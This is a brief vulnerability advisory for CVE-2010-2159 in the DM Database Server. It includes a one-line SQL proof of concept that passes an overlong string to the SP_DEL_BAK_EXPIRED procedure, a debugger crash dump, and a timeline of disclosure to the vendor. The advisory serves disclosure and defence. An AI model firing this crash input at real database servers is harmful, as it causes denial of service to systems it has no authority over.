DM Database Server Memory Corruption Vulnerability
========
Vulnerable:All Version
Vendor:www.dameng.com
Discovered by:Shennan Wang (HuaweiSymantec SRT)
CVE:CVE-2010-2159
Details:
=========
A vulnerability in DM Database Server all version allows attacker to execute \
arbitrary code or cause a DoS (Denial of Service).Authentication is required to exploit this vulnerability.
The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure.

POC: 
=========
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');

(458.5fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for \
C:\dmdbms\bin\wdm_dll.dll -  wdm_dll+0xd1753:
100d1753 f2ae            repne scas byte ptr es:[edi]
0:009> da ebp
074ed1fc  "AAAAAAAAAAAAAAAAAAAA"

Timeline:
========
2010.04.17   Report to vendor,no response.
2010.05.31   Public